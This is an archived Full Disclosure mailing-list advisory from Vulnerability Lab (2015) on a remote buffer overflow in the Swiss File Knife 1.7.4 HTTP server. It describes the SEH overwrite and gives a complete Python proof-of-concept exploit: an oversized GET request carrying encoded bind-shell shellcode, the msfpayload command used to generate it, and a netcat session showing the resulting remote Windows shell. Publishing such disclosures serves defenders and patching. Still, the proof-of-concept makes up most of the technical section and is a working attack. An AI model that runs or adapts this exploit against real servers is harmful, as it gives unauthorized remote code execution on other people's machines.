[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Swiss File Knife v1.7.4 HTTP - Buffer Overflow Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-02-28 11:08:19
Message-ID: 54F1A1A3.8050702 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Swiss File Knife v1.7.4 HTTP - Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1441
Release Date:
=============
2015-02-27
Vulnerability Laboratory ID (VL-ID):
====================================
1441
Common Vulnerability Scoring System:
====================================
8.4
Product & Service Introduction:
===============================
Swiss File Knife - A Command Line Tools Collection that combines many functions in a single, \
portable executable that belongs onto every USB stick. Search and convert text files, instant \
simple FTP/HTTP server, find duplicate files, compare folders, treesize, run own commands on \
all files of a folder - it`s all within a single tool.
(Copy of the Vendor Homepage: http://stahlworks.com/dev/swiss-file-knife.html )
Abstract Advisory Information:
==============================
An indepdent vulnerability laboratory researcher discovered a buffer overflow vulnerability in \
the official Swiss File Knife 1.7.4 HTTP Server software.
Vulnerability Disclosure Timeline:
==================================
2015-02-18: Vendor Fix/Patch (Developer Team)
2015-02-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Stahlworks
Product: Swiss File Knife - HTTP Server 1.7.4 (Windows, MacOS & Linux)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered by an indepdent researcher in the official \
Swiss File Knife 1.7.4 HTTP Server software. The vulnerability allows local or remote attacker \
to gain higher system or access privileges by exploitation of a classic buffer overflow \
vulnerability.
Payload overwrites SEH with address of pop pop ret sequence, which redirects execution flow to \
the attacker buffer started with fixed string “unexpected: file left open for write: \
<attacker payload>†. First two bytes “un†- 75 6E in hex are an opcode for \
JNZ SHORT sfk174.005A7AC0, which successfully jumps over the fixed text right into attacker \
controlled buffer filled with nops and finally shellcode.
The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common \
vulnerability scoring system) count of 8.4.
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or privileged \
application user account. For security demonstration or to reproduce the vulnerability follow \
the provided information and steps below to continue.
PoC: Exploit Code (*.py)
!/usr/bin/env python
Swiss File Knife 1.7.4 (rev 1) Buffer Overflow
Author: lucyoa <lucyoa[at]reverse-shell.com
SFK's http server launched using following method:
C:\fuzz\sfksfk174.exe httpserv
SFK Instant HTTP Server. For help, type "sfk httpserv -help".
Waiting on port 80. Try http://192.168.56.111/ in your browser.
Exploitation:
lucyoa@sage~/exploits/sfk174$ ./exploit.py 192.168.56.111 80
lucyoa@sage~/exploits/sfk174$ nc 192.168.56.111 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\fuzz\sfkipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.56.111
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\fuzz\sfk
import sys
import socket
def usage(s):
print "%s <ip<port" % s
exit(0)
def main():
if len(sys.argv) != 3:
usage(sys.argv[0])
msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/alpha_mixed -t c
[*] x86/alpha_mixed succeeded with size 744 (iteration=1)
sc = (
"\x89\xe0\xd9\xc5\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x78\x68\x4d\x59\x63\x30\x73\x30\x67\x70\x55\x30\x4b"
"\x39\x79\x75\x35\x61\x59\x42\x42\x44\x4e\x6b\x63\x62\x56\x50"
"\x6c\x4b\x71\x42\x46\x6c\x4e\x6b\x63\x62\x64\x54\x4e\x6b\x34"
"\x32\x66\x48\x36\x6f\x38\x37\x50\x4a\x57\x56\x70\x31\x39\x6f"
"\x44\x71\x39\x50\x4c\x6c\x67\x4c\x45\x31\x53\x4c\x63\x32\x46"
"\x4c\x31\x30\x5a\x61\x6a\x6f\x76\x6d\x66\x61\x39\x57\x6d\x32"
"\x6c\x30\x46\x32\x63\x67\x4e\x6b\x43\x62\x46\x70\x6c\x4b\x67"
"\x32\x45\x6c\x77\x71\x4a\x70\x6e\x6b\x43\x70\x53\x48\x4b\x35"
"\x59\x50\x42\x54\x50\x4a\x63\x31\x78\x50\x72\x70\x4c\x4b\x67"
"\x38\x54\x58\x6c\x4b\x73\x68\x31\x30\x43\x31\x38\x53\x49\x73"
"\x65\x6c\x77\x39\x4e\x6b\x34\x74\x4c\x4b\x67\x71\x49\x46\x70"
"\x31\x59\x6f\x35\x61\x39\x50\x4c\x6c\x5a\x61\x7a\x6f\x44\x4d"
"\x35\x51\x4a\x67\x47\x48\x4b\x50\x63\x45\x78\x74\x46\x63\x31"
"\x6d\x4b\x48\x67\x4b\x63\x4d\x34\x64\x62\x55\x49\x72\x72\x78"
"\x6e\x6b\x70\x58\x71\x34\x67\x71\x79\x43\x61\x76\x6e\x6b\x44"
"\x4c\x50\x4b\x4c\x4b\x42\x78\x67\x6c\x63\x31\x68\x53\x6c\x4b"
"\x73\x34\x6e\x6b\x57\x71\x38\x50\x6d\x59\x70\x44\x37\x54\x57"
"\x54\x61\x4b\x43\x6b\x63\x51\x32\x79\x32\x7a\x32\x71\x59\x6f"
"\x6d\x30\x72\x78\x71\x4f\x32\x7a\x6c\x4b\x44\x52\x7a\x4b\x4d"
"\x56\x43\x6d\x53\x58\x75\x63\x70\x32\x67\x70\x33\x30\x63\x58"
"\x72\x57\x72\x53\x56\x52\x73\x6f\x30\x54\x43\x58\x30\x4c\x54"
"\x37\x45\x76\x56\x67\x59\x6f\x4a\x75\x4f\x48\x6e\x70\x76\x61"
"\x77\x70\x63\x30\x77\x59\x5a\x64\x33\x64\x62\x70\x75\x38\x65"
"\x79\x6f\x70\x30\x6b\x43\x30\x6b\x4f\x78\x55\x30\x50\x52\x70"
"\x72\x70\x42\x70\x31\x50\x72\x70\x57\x30\x30\x50\x62\x48\x38"
"\x6a\x66\x6f\x6b\x6f\x4b\x50\x6b\x4f\x49\x45\x4b\x39\x69\x57"
"\x55\x61\x49\x4b\x32\x73\x65\x38\x43\x32\x53\x30\x62\x31\x43"
"\x6c\x4d\x59\x59\x76\x51\x7a\x44\x50\x46\x36\x50\x57\x70\x68"
"\x5a\x62\x4b\x6b\x66\x57\x43\x57\x49\x6f\x58\x55\x62\x73\x31"
"\x47\x35\x38\x4e\x57\x4d\x39\x66\x58\x39\x6f\x4b\x4f\x59\x45"
"\x36\x33\x73\x63\x36\x37\x31\x78\x30\x74\x68\x6c\x35\x6b\x69"
"\x71\x39\x6f\x4a\x75\x62\x77\x6c\x49\x68\x47\x71\x78\x44\x35"
"\x30\x6e\x32\x6d\x71\x71\x39\x6f\x49\x45\x43\x58\x71\x73\x72"
"\x4d\x50\x64\x53\x30\x6e\x69\x4d\x33\x36\x37\x63\x67\x33\x67"
"\x46\x51\x4b\x46\x30\x6a\x55\x42\x62\x79\x50\x56\x6d\x32\x6b"
"\x4d\x45\x36\x7a\x67\x70\x44\x66\x44\x65\x6c\x65\x51\x65\x51"
"\x6c\x4d\x72\x64\x77\x54\x76\x70\x78\x46\x55\x50\x37\x34\x66"
"\x34\x56\x30\x46\x36\x53\x66\x33\x66\x43\x76\x51\x46\x32\x6e"
"\x56\x36\x63\x66\x50\x53\x71\x46\x61\x78\x70\x79\x58\x4c\x55"
"\x6f\x4d\x56\x69\x6f\x4b\x65\x4f\x79\x4b\x50\x70\x4e\x70\x56"
"\x37\x36\x69\x6f\x50\x30\x61\x78\x34\x48\x4c\x47\x35\x4d\x61"
"\x70\x59\x6f\x5a\x75\x6f\x4b\x4a\x50\x4f\x45\x49\x32\x62\x76"
"\x45\x38\x6e\x46\x6f\x65\x6f\x4d\x4d\x4d\x39\x6f\x7a\x75\x77"
"\x4c\x65\x56\x63\x4c\x76\x6a\x4f\x70\x4b\x4b\x79\x70\x44\x35"
"\x64\x45\x6f\x4b\x72\x67\x46\x73\x73\x42\x50\x6f\x72\x4a\x47"
"\x70\x32\x73\x49\x6f\x38\x55\x41\x41")
0x004f1b8d from sfk174.exe
ret = "\x8d\x1b\x4f\x00"
nop = "\x90"*(128807 - len(sc))
nop2 = "\x90"*121068
buff = nop + sc + nop2 + ret
payload = "GET /"+buff+" HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
s.send(payload)
s.close()
if __name__ == "__main__":
main()
Solution - Fix & Patch:
=======================
2015-02-18: Vendor Fix/Patch (Developer Team)
Update: http://sourceforge.net/projects/swissfileknife/files/1-swissfileknife/1.7.4/
Security Risk:
==============
The security risk of the local and remote buffer overflow software vulnerability is estimated \
as high. (CVSS 8.4)
Credits & Authors:
==================
lucyoa - [lucyoa[at]reverse-shell.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic